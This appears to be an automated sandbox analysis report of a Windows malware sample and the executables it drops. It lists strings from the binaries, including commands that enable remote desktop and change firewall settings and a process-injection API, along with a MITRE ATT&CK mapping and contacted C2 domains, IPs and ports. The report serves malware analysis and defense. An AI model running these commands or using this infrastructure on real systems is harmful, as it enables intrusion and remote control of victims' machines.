A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa 
LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                          Source: Gxtuum.exe, 0000000E.00000002.3763187242.0000000000461000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 0000000E.00000002.3763187242.0000000000461000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa 
LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                          Source: Fp80Ocyhqm.exe String found in binary or memory: net start termservice
                          Source: Fp80Ocyhqm.exeString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 
Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                          Source: Gxtuum.exe.0.dr String found in binary or memory: net start termservice
MITRE ATT&CK Matrix (one line per tactic; numbers in parentheses are the counts shown in the report's matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Scheduled Task/Job (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading (1); Process Injection (112); Scheduled Task/Job (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (12); DLL Side-Loading (1); Masquerading (11); Virtualization/Sandbox Evasion (251); Process Injection (112); Indicator Removal from Tools; HTML Smuggling
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (236); Security Software Discovery (761); Process Discovery (2); Virtualization/Sandbox Evasion (251); Application Window Discovery (1); System Owner/User Discovery (1)
Lateral Movement: Remote Desktop Protocol (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Screen Capture (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (12); Encrypted Channel (1); Non-Standard Port (1); Non-Application Layer Protocol (3); Application Layer Protocol (113); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
Behavior Graph ID: 1631944, Sample: Fp80Ocyhqm.exe, Startdate: 07/03/2025, Architecture: WINDOWS, Score: 100

Start node: contacts towerbingobongoboom.com and cobolrationumelawrtewarms.com; signatures: Suricata IDS alerts for network traffic, Found malware configuration, Antivirus detection for URL or domain, 11 other signatures; started processes: Fp80Ocyhqm.exe, fvvb.exe, Gxtuum.exe, 5 other processes.

Fp80Ocyhqm.exe: dropped C:\Users\user\AppData\Local\...\Gxtuum.exe (PE32) and C:\Users\user\...\Gxtuum.exe:Zone.Identifier (ASCII); signatures: Contains functionality to start a terminal service, Contains functionality to inject code into remote processes; started Gxtuum.exe.

fvvb.exe: contacts towerbingobongoboom.com 213.209.150.137, ports 4000, 4489, 49694 (KEMINETAL, Germany); signatures: Multi AV Scanner detection for dropped file, Detected unpacking (changes PE section rights), Tries to detect sandboxes and other dynamic analysis tools (window names), 4 other signatures.

Gxtuum.exe (started by Fp80Ocyhqm.exe): contacts cobolrationumelawrtewarms.com 107.189.27.66, ports 49688, 49689, 49691 (PONYNETUS, United States) and 45.59.120.8, ports 49690, 80 (ANYNODEUS, United States); dropped C:\Users\user\AppData\...\cubrodriver.exe (PE32) and C:\Users\user\AppData\...\cubrodriver[1].exe (PE32); signatures: Antivirus detection for dropped file, Multi AV Scanner detection for dropped file, Contains functionality to start a terminal service; started cubrodriver.exe.

cubrodriver.exe: dropped C:\ProgramData\giab\fvvb.exe (PE32); signatures: Multi AV Scanner detection for dropped file, Detected unpacking (changes PE section rights), Tries to evade debugger and weak emulator (self modifying code), 4 other signatures.

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.